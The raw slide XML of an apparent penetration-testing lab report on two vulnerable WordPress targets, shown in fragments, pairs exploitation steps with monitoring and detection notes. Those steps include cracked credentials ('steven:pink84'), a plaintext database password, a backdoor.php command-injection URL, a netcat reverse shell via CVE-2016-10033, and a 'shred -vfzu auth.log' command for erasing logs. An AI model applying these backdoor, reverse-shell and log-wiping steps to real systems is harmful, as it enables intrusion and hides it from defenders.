            <a:off x="333" y="45278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3" name="Google Shape;1603;p126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4" name="Google Shape;1604;p126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05" name="Google Shape;160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6" name="Google Shape;160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7" name="Google Shape;1607;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5922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8" name="Google Shape;1608;p126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9" name="Google Shape;1609;p126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0" name="Google Shape;161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1" name="Google Shape;161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2" name="Google Shape;1612;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-333" y="73166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3" name="Google Shape;1613;p126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4" name="Google Shape;1614;p126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15" name="Google Shape;161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6" name="Google Shape;161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7" name="Google Shape;1617;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="87102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8" name="Google Shape;1618;p126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9" name="Google Shape;1619;p126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0" name="Google Shape;162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1" name="Google Shape;162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2" name="Google Shape;1622;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-133" y="10103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126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126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25" name="Google Shape;162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6" name="Google Shape;162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7" name="Google Shape;1627;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67" y="115656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2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0" name="Google Shape;1630;p12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31" name="Google Shape;1631;p12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2" name="Google Shape;163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33" name="Google Shape;1633;p12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4" name="Google Shape;163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5" name="Google Shape;1635;p127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6" name="Google Shape;1636;p127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37" name="Google Shape;163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8" name="Google Shape;163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9" name="Google Shape;1639;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258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0" name="Google Shape;1640;p127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1" name="Google Shape;1641;p127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2" name="Google Shape;164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3" name="Google Shape;164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4" name="Google Shape;1644;p127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127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6" name="Google Shape;1646;p127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47" name="Google Shape;164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9" name="Google Shape;1649;p127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0" name="Google Shape;1650;p127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1" name="Google Shape;1651;p127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2" name="Google Shape;165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4" name="Google Shape;1654;p127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5" name="Google Shape;1655;p127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6" name="Google Shape;1656;p127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57" name="Google Shape;165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9" name="Google Shape;1659;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32324" y="5694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127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1" name="Google Shape;1661;p127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2" name="Google Shape;166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4" name="Google Shape;1664;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658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127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6" name="Google Shape;1666;p127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67" name="Google Shape;166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8" name="Google Shape;166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9" name="Google Shape;1669;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="3357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0" name="Google Shape;1670;p127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1" name="Google Shape;1671;p127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2" name="Google Shape;167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3" name="Google Shape;167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4" name="Google Shape;1674;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="4525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76.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId21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7.xml"/><Relationship Id="rId42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0.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout123.xml"/><Relationship Id="rId45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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout125.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout124.xml"/><Relationship Id="rId49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16.xml"/><Relationship Id="rId38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06.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout128.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout127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31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  <p:sldLayoutId id="2147483775" r:id="rId48"/>
    <p:sldLayoutId id="2147483776" r:id="rId49"/>
    <p:sldLayoutId id="2147483777" r:id="rId50"/>
    <p:sldLayoutId id="2147483778" r:id="rId51"/>
    <p:sldLayoutId id="214748377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76.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId7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ve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1003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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.115/backdoor.php?cmd=id" TargetMode="External"/><Relationship Id="rId5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70.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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192.168.1.110/wordpress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9" name="Google Shape;2319;p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0" name="Google Shape;2320;p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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open port 22 SSH &amp; Weak Password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2" name="Google Shape;2412;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717350" y="192465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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SSH Ports for unauthorized access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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH login alerts 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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port 22 access alerts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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse Shell exploit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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use different port (80)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413" name="Google Shape;241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4025" y="4914900"/>
            <a:ext cx="11248725" cy="63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7a3f8acfbb_2_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Exploitation: WordPress Configuration and SQL Database</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2420" name="Google Shape;2420;g7a3f8acfbb_2_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1" name="Google Shape;2421;g7a3f8acfbb_2_10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13934175" y="2226725"/>
            <a:ext cx="10845900" cy="81300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MySQL Database username </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="40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lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and password </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="40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R@v3nSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>were stored in plain text. </a:t>
            </a:r>
            <a:endParaRPr sz="4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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Root access can be easily acquired by anyone with read access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wp-config.php file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Once logged into MySQL, we were able to search the entire database.</a:t>
            </a:r>
            <a:endParaRPr sz="14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Exploring the wp_posts table revealed flag3.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422" name="Google Shape;2422;g7a3f8acfbb_2_10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4297" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="279500" y="2226725"/>
            <a:ext cx="14498175" cy="77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Google Shape;2423;g7a3f8acfbb_2_10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="64075" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="279488" y="10444425"/>
            <a:ext cx="23818526" cy="19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4" name="Google Shape;2424;g7a3f8acfbb_2_10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541100" y="4173300"/>
            <a:ext cx="7946700" cy="2086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g7a3f8acfbb_2_10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11463100" y="11865875"/>
            <a:ext cx="6767400" cy="3993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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPress Configuration and SQL Database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800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2431" name="Google Shape;2431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2" name="Google Shape;2432;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2209575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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Database Alert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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring server traffic for any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attempts to access SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Triggers when external and unauthorized IPs connections are made to SQL database or directories                                                                                                                                                                                    </a:t>
            </a:r>
            <a:endParaRPr sz="4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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP address spoofing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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute-force SQL database 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33" name="Google Shape;243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2475" y="6094575"/>
            <a:ext cx="12785625" cy="6691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d10d856d54_0_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Exploitation: Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2439" name="Google Shape;2439;gd10d856d54_0_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0" name="Google Shape;2440;gd10d856d54_0_36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-363425" y="1179975"/>
            <a:ext cx="12497700" cy="4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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We were able to dump the users and password hashes from wp_users.</a:t>
            </a:r>
            <a:endParaRPr sz="4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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We cracked Steven’s password with John the Ripper.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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john </a:t>
            </a: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wp_hashes.txt</a:t>
            </a:r>
            <a:endParaRPr sz="4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441" name="Google Shape;2441;gd10d856d54_0_36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14432" l="0" r="53662" t="45776"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11282625" y="7375100"/>
            <a:ext cx="8757901" cy="52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gd10d856d54_0_36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6308" l="0" r="0" t="16661"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381825" y="5298175"/>
            <a:ext cx="10641050" cy="43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gd10d856d54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59613">
            <a:off x="16345632" y="3808456"/>
            <a:ext cx="9009163" cy="900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gd10d856d54_0_36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="49192" t="40992"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11275100" y="5290925"/>
            <a:ext cx="8757899" cy="18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gd10d856d54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825" y="10000294"/>
            <a:ext cx="10641050" cy="2610081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gd10d856d54_0_36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10450400" y="1179975"/>
            <a:ext cx="13195800" cy="4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 startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We were then able to SSH into the system with Steven’s credentials &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="40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steven:pink84</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="40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 startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We performed a python one-liner to spawn a TTY shell with root privileges.</a:t>
            </a:r>
            <a:endParaRPr sz="4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2447" name="Google Shape;2447;gd10d856d54_0_36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11281675" y="5298175"/>
            <a:ext cx="8745000" cy="1088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gd10d856d54_0_36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795100" y="7638600"/>
            <a:ext cx="8436600" cy="101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gd10d856d54_0_36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432250" y="10849875"/>
            <a:ext cx="3029700" cy="4353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gd10d856d54_0_36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11426825" y="11503025"/>
            <a:ext cx="6513300" cy="5079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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2456" name="Google Shape;2456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7" name="Google Shape;2457;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-841625" y="2066125"/>
            <a:ext cx="23350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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="40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[Root Access Denied] Alert would detect this activity.</a:t>
            </a:r>
            <a:endParaRPr sz="4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This metric would measure the number of times root access is denied </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to files and directories on the server.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 This alert would be triggered for ANY sudo commands performed within the network. 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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="40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rgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable, clear, modify, audit trail in /var/log/auth.log (Linux)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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$ shred -vfzu auth.log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Erase command history.</a:t>
            </a:r>
            <a:endParaRPr sz="4000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Escalating privileges before accessing the database would prevent the alert from being   triggered (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerabilities).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458" name="Google Shape;24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6425" y="2134950"/>
            <a:ext cx="5043550" cy="37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3" name="Google Shape;24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64" name="Google Shape;2464;p1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14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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2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Vulnerabilities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6" name="Google Shape;2466;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Critical Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>: Target 2</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2472" name="Google Shape;2472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3" name="Google Shape;2473;p15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000"/>
              <a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4000"/>
              <a:t>Target 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>.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474" name="Google Shape;2474;p15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176962" y="35664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{6A5ADC18-6768-4406-9B7A-813AE94378F0}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Brute-Force URL Directories/files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for brute force discovery of directory structure.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0" i="0" lang="en-US" sz="40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Reveals all files and directories present inside the web server. This enumeration will aid an attacker.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Netcat Reverse Shell/RCE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>
                          <a:solidFill>
                            <a:srgbClr val="3366CC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CVE-2016-10033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t/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Utilizing a Netcat listener with </a:t>
                      </a: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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4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bash script and a web browser, it was possible to establish a reverse TTY shell.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reverse shell grants unauthorized access to the server.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t/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UDF </a:t>
                      </a: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t/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UDF C source code will execute Commands in the context of a SQL statement.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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escalate their privileges to root.</a:t>
                      </a:r>
                      <a:endParaRPr sz="4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t/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" name="Google Shape;2479;g7a3f8acfbb_4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5" cy="122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g7a3f8acfbb_4_2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g7a3f8acfbb_4_29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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits, Monitoring &amp; Detection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82" name="Google Shape;2482;g7a3f8acfbb_4_29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Exploitation: Brute-Force URL Directories/files</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="66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2488" name="Google Shape;2488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89" name="Google Shape;24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275" y="1971250"/>
            <a:ext cx="12686049" cy="74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0" name="Google Shape;2490;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152325" y="7043075"/>
            <a:ext cx="11960100" cy="391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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008874" y="9627350"/>
            <a:ext cx="111255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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="en-US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After enumerating Target 2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> we</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="en-US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discovered some potentially interesting directories.  </a:t>
            </a:r>
            <a:endParaRPr i="0" sz="4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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"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i="0" lang="en-US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navigated to the site and explored the /vendor/PATH directory and discovered flag1.</a:t>
            </a:r>
            <a:endParaRPr i="0" sz="4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2" name="Google Shape;2492;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="31851" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13490412" y="1971254"/>
            <a:ext cx="10256589" cy="754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Google Shape;249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90412" y="9794737"/>
            <a:ext cx="10256588" cy="30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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13653796" y="12223102"/>
            <a:ext cx="7819200" cy="3918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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17013925" y="2386575"/>
            <a:ext cx="3511200" cy="576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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13496550" y="5349250"/>
            <a:ext cx="3346800" cy="391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Exploitation: Netcat Reverse Shell/RCE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2502" name="Google Shape;2502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3" name="Google Shape;25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160" y="1937346"/>
            <a:ext cx="12793215" cy="6254931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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597160" y="8706423"/>
            <a:ext cx="122232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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We used</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="en-US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custom bash script to upload a backdoor.php file to the server in order establish a shell and execute command injections.</a:t>
            </a:r>
            <a:endParaRPr i="0" sz="4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Char char="●"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running the exploit, we navigated to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http://192.168.1.115/backdoor.php?cmd=id</a:t>
            </a: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ensure the exploit worked.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5" name="Google Shape;2505;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13508425" y="10783125"/>
            <a:ext cx="10902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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="40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i="0" lang="en-US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 could then perform command injections in the address bar to connect back to the listener set up on the kali machine, and establish a shell.</a:t>
            </a:r>
            <a:endParaRPr i="0" sz="4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6" name="Google Shape;250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07013" y="1942064"/>
            <a:ext cx="9973477" cy="869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Table of Contents</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2327" name="Google Shape;2327;p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8" name="Google Shape;2328;p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This document contains the following resources: </a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2329" name="Google Shape;2329;p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</a:rPr>
              <a:t>Target 1 Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2330" name="Google Shape;2330;p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Target 1 Exploits, Monitoring &amp; Detection</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2331" name="Google Shape;2331;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32808" y="8082708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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 2 Vulnerabilities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2332" name="Google Shape;2332;p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</p:spPr>
        <p:txBody>
